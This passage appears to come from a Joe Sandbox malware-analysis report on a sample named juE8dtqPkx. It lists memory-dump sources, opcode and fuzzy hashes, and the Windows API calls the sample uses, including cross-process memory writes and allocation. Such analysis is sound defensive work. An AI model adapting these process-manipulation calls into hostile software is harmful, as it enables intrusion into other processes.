                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                    • String ID:
                                                    • API String ID: 3741023627-0
                                                    • Opcode ID: 1f18e2cfcdf944224a2d79a82bd846e8569cbd7b4094970ae8d1428a0e6a4617
                                                    • Instruction ID: 069ac2582a8c3c153a507cef710a9e07e91c6f457c78871e3a9641c65eda6ae6
                                                    • Opcode Fuzzy Hash: 1f18e2cfcdf944224a2d79a82bd846e8569cbd7b4094970ae8d1428a0e6a4617
                                                    • Instruction Fuzzy Hash: AB01DD315403086BE7349B54EE8DBDB737CFB14705F00465FB645921C0E7F4A9948B95
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: Destroy$DeleteObjectWindow$Icon
                                                    • String ID:
                                                    • API String ID: 4023252218-0
                                                    • Opcode ID: 3835efce57e2eefc6c6d584a426a71e2dd3a2f260109f85cc330253665e7d223
                                                    • Instruction ID: b4c4dbb9b59ba1bd7f08d964dfa6937d7ad9fb038e30cf105cf785d591c64ca0
                                                    • Opcode Fuzzy Hash: 3835efce57e2eefc6c6d584a426a71e2dd3a2f260109f85cc330253665e7d223
                                                    • Instruction Fuzzy Hash: D5014870301A01DBDB10EF65E9D8A2B77A8BF48762F10462AFD04D7352D739D849CBA9
                                                    APIs
                                                    • SendMessageW.USER32(?,00001101,00000000,?), ref: 004555FC
                                                    • DeleteObject.GDI32(?), ref: 00455736
                                                    • DeleteObject.GDI32(?), ref: 00455744
                                                    • DestroyIcon.USER32(?), ref: 00455752
                                                    • DestroyWindow.USER32(?), ref: 00455760
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: DeleteDestroyObject$IconMessageSendWindow
                                                    • String ID:
                                                    • API String ID: 1489400265-0
                                                    • Opcode ID: 7dd20da83386a23a1814408c1199d2c33e99a8c26f67204b6fd348d50f61361a
                                                    • Instruction ID: 3262712e9a8127eed33bb9eb3d9864066e7dde5d47db0d590f2b6463dd6d37f9
                                                    • Opcode Fuzzy Hash: 7dd20da83386a23a1814408c1199d2c33e99a8c26f67204b6fd348d50f61361a
                                                    • Instruction Fuzzy Hash: 07017C74300601DBCB10EF25EEC8A2A73A8BF48712F004569FE019B286D778DC49CB68
                                                    APIs
                                                      • Part of subcall function 00430003: InvalidateRect.USER32(?,00000000,00000001), ref: 00430091
                                                    • DestroyWindow.USER32(?), ref: 00455728
                                                    • DeleteObject.GDI32(?), ref: 00455736
                                                    • DeleteObject.GDI32(?), ref: 00455744
                                                    • DestroyIcon.USER32(?), ref: 00455752
                                                    • DestroyWindow.USER32(?), ref: 00455760
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: Destroy$DeleteObjectWindow$IconInvalidateRect
                                                    • String ID:
                                                    • API String ID: 1042038666-0
                                                    • Opcode ID: 9df849479103f2de49514c9ec76f9cef1897402069f9b01ba3cc14c1fa4130bc
                                                    • Instruction ID: 2016740d4609c4bbd0e5f1cf6dc7522ca00853e433b5032f7809eda0dc31aff9
                                                    • Opcode Fuzzy Hash: 9df849479103f2de49514c9ec76f9cef1897402069f9b01ba3cc14c1fa4130bc
                                                    • Instruction Fuzzy Hash: 3701F670200601DBCB10EF69E9D8A2B37ACAF49762B00466AFD01D7256D769DC498B69
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: Path$ObjectStroke$DeleteFillSelect
                                                    • String ID:
                                                    • API String ID: 2625713937-0
                                                    • Opcode ID: d1b587dd721dc2c7258c81d6469637db7768a45f5ba7f0175e0776e0e6e6c26f
                                                    • Instruction ID: 382768f54733291aaafbd4c53fc5fd67df7ff3e11fccf1fbf51b229105ba29ed
                                                    • Opcode Fuzzy Hash: d1b587dd721dc2c7258c81d6469637db7768a45f5ba7f0175e0776e0e6e6c26f
                                                    • Instruction Fuzzy Hash: B3F036751125109BD3519F28FD4875E3B68E747321F94423AEA15923F0CB785449CB6D
                                                    APIs
                                                    • __getptd.LIBCMT ref: 0041780F
                                                      • Part of subcall function 00417A69: __getptd_noexit.LIBCMT ref: 00417A6C
                                                      • Part of subcall function 00417A69: __amsg_exit.LIBCMT ref: 00417A79
                                                    • __getptd.LIBCMT ref: 00417826
                                                    • __amsg_exit.LIBCMT ref: 00417834
                                                    • __lock.LIBCMT ref: 00417844
                                                    • __updatetlocinfoEx_nolock.LIBCMT ref: 00417858
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                    • String ID:
                                                    • API String ID: 938513278-0
                                                    • Opcode ID: 82c9f3bbc84dc287df7640515fd49376d4ae64643407e313ceafc36016311655
                                                    • Instruction ID: 276dd8d19a6a3be70f37c916a71154ef36d62806621923b96dbf7b6e4fe89171
                                                    • Opcode Fuzzy Hash: 82c9f3bbc84dc287df7640515fd49376d4ae64643407e313ceafc36016311655
                                                    • Instruction Fuzzy Hash: 6DF09632A4C7009AD721BBA6940B7DD33B0AF10768F11415FF541572D2CB6C59C1CB9D
                                                    APIs
                                                      • Part of subcall function 004118F0: _doexit.LIBCMT ref: 004118FC
                                                    • ___set_flsgetvalue.LIBCMT ref: 00413D20
                                                      • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                      • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                    • ___fls_getvalue@4.LIBCMT ref: 00413D2B
                                                      • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                    • ___fls_setvalue@8.LIBCMT ref: 00413D3E
                                                    • GetLastError.KERNEL32(00000000,?,00000000), ref: 00413D47
                                                    • ExitThread.KERNEL32 ref: 00413D4E
                                                    • GetCurrentThreadId.KERNEL32 ref: 00413D54
                                                    • __freefls@4.LIBCMT ref: 00413D74
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: Value$Thread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                                                    • String ID:
                                                    • API String ID: 2403457894-0
                                                    • Opcode ID: 20cce849b0c51a5c00e20c35783146c720bf18a6b0a2527f17bda4bbe7e89b53
                                                    • Instruction ID: 99982f4671f9afe760f134679f3a1374bf557b67af872bc9692f731b59fefeca
                                                    • Opcode Fuzzy Hash: 20cce849b0c51a5c00e20c35783146c720bf18a6b0a2527f17bda4bbe7e89b53
                                                    • Instruction Fuzzy Hash: 1AE04F318443056B8F013BB39C1E8CF363C9E0434AB20082ABE1493112DA2C99C1C6BE
                                                    APIs
                                                      • Part of subcall function 004118F0: _doexit.LIBCMT ref: 004118FC
                                                    • ___set_flsgetvalue.LIBCMT ref: 004151C0
                                                      • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                      • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                    • ___fls_getvalue@4.LIBCMT ref: 004151CB
                                                      • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                    • ___fls_setvalue@8.LIBCMT ref: 004151DD
                                                    • GetLastError.KERNEL32(00000000,?,00000000), ref: 004151E6
                                                    • ExitThread.KERNEL32 ref: 004151ED
                                                    • __freefls@4.LIBCMT ref: 00415209
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: Value$ErrorExitLastThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                                                    • String ID:
                                                    • API String ID: 4247068974-0
                                                    • Opcode ID: 3508d61e785490a8cfc18c63a66594c600054726567160c295e9e14b5a274e31
                                                    • Instruction ID: 3b3fb4cf1982b2ada2e5851f983e2cc6228237abb2dca353483d11accd99f00a
                                                    • Opcode Fuzzy Hash: 3508d61e785490a8cfc18c63a66594c600054726567160c295e9e14b5a274e31
                                                    • Instruction Fuzzy Hash: E5E0B631848705AECB013BB29D1E9DF3A799E54749B20082ABE1492122EE6C88D1C669
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: )$U$\
                                                    • API String ID: 0-3705770531
                                                    • Opcode ID: 028001eb2bff774db3903015b7fa80ce6d69291786b8857f67b928b721b55690
                                                    • Instruction ID: d0f1885598f34d5f764b4f2a5794ec4e3d7857f6dac93f6e146ba8491093b400
                                                    • Opcode Fuzzy Hash: 028001eb2bff774db3903015b7fa80ce6d69291786b8857f67b928b721b55690
                                                    • Instruction Fuzzy Hash: 83C1C074A00249CFEB24CF69C5806AEBBF2FF85304F2481ABD8569B351D739994ACF15
                                                    APIs
                                                      • Part of subcall function 004426CD: _wcslen.LIBCMT ref: 004426F9
                                                    • CoInitialize.OLE32(00000000), ref: 0046E505
                                                    • CoCreateInstance.OLE32(00482A08,00000000,00000001,004828A8,?), ref: 0046E51E
                                                    • CoUninitialize.OLE32 ref: 0046E53D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                    • String ID: .lnk
                                                    • API String ID: 886957087-24824748
                                                    • Opcode ID: 275befd32e5b5cb51e2fc879a9ecc6bbb724afd33f596a1e549e31a6ffdfd8c7
                                                    • Instruction ID: 2644725dabb75134900838bfbf7f9974cf5b6b8c274c659ea1b0544ab4b4cf98
                                                    • Opcode Fuzzy Hash: 275befd32e5b5cb51e2fc879a9ecc6bbb724afd33f596a1e549e31a6ffdfd8c7
                                                    • Instruction Fuzzy Hash: A6A1CB756042019FC700EF65C980E5BB7E9AFC8308F108A5EF9859B392DB35EC45CBA6
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: _memmove
                                                    • String ID: \
                                                    • API String ID: 4104443479-2967466578
                                                    • Opcode ID: 236e1e21dc65edc907fd0526d8e82b29cd887e6a6cae6abce2d2318f267918b8
                                                    • Instruction ID: 90b25fc4546a2c21e21e7939c456fa175a28996bec6c3309f7edcf8d77039fcb
                                                    • Opcode Fuzzy Hash: 236e1e21dc65edc907fd0526d8e82b29cd887e6a6cae6abce2d2318f267918b8
                                                    • Instruction Fuzzy Hash: 8AB1C270D04289CFEF15CFA9C8807AEBBB2BF55308F28419ED451AB381D7795946CB1A
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: _memmove
                                                    • String ID: \
                                                    • API String ID: 4104443479-2967466578
                                                    • Opcode ID: aaea77048b6460e77790bc9063151364371e311f89c51572a31744d174c5d814
                                                    • Instruction ID: 47d8400a167da4587eb122393216330e55bf30386b581c043e0675457d4a745f
                                                    • Opcode Fuzzy Hash: aaea77048b6460e77790bc9063151364371e311f89c51572a31744d174c5d814
                                                    • Instruction Fuzzy Hash: F1B1C270D04289CFEF15CFA9C8807AEBBB2BF55308F28419ED451AB381D7795946CB1A
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: _memmove
                                                    • String ID: \
                                                    • API String ID: 4104443479-2967466578
                                                    • Opcode ID: 51371dbcd6d614fdce5bfd4d2520a50a5cfc61004088100711ab8bbb78939718
                                                    • Instruction ID: 4d1558bed40bbae7f26d93592334ac0d2c658ca85fbb7fec499742c135aa7d63
                                                    • Opcode Fuzzy Hash: 51371dbcd6d614fdce5bfd4d2520a50a5cfc61004088100711ab8bbb78939718
                                                    • Instruction Fuzzy Hash: E5A1C270D04289CFEF15CFA9C8807AEBBB2BF55308F28419ED441AB381D7795946CB1A
                                                    Strings
                                                    • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 0046A75B
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: _memmovestd::exception::exception$Exception@8Throw_malloc_wcslen
                                                    • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                    • API String ID: 708495834-557222456
                                                    • Opcode ID: d40038a01c4269f20fc5c379b1ec5e28d4e4406ba998724a8cb9ece69d71f944
                                                    • Instruction ID: 9c514e09f8cb76db8ae150367893d7536957bb5c5403f45e3580b17af89e858a
                                                    • Opcode Fuzzy Hash: d40038a01c4269f20fc5c379b1ec5e28d4e4406ba998724a8cb9ece69d71f944
                                                    • Instruction Fuzzy Hash: 7C917F711087009FC310EF65C88186BB7E8AF89314F148D2FF595672A2E778E919CB9B
                                                    APIs
                                                      • Part of subcall function 00434319: WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0043434A
                                                    • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 004365EF
                                                      • Part of subcall function 004342DD: ReadProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0043430E
                                                      • Part of subcall function 004343AD: GetWindowThreadProcessId.USER32(?,?), ref: 004343E0
                                                      • Part of subcall function 004343AD: OpenProcess.KERNEL32(00000438,00000000,?), ref: 004343F1
                                                      • Part of subcall function 004343AD: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004), ref: 00434408
                                                    • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0043665F
                                                    • SendMessageW.USER32(00000000,00001111,00000000,00000000), ref: 004366DF
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                    • String ID: @
                                                    • API String ID: 4150878124-2766056989
                                                    • Opcode ID: 6104cbe5d4ae3c4c99a3306f76968d572a7f9f5d55716afa725ed0ba86ca2a2d
                                                    • Instruction ID: 60a9f40d71a87185ad744a771aacdfc79ad0a16393efc777ae91d2f205fac39b
                                                    • Opcode Fuzzy Hash: 6104cbe5d4ae3c4c99a3306f76968d572a7f9f5d55716afa725ed0ba86ca2a2d
                                                    • Instruction Fuzzy Hash: 0D51B972A00218ABCB10DFA5DD42FDEB778EFC9304F00459AFA05EB180D6B4BA45CB65
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
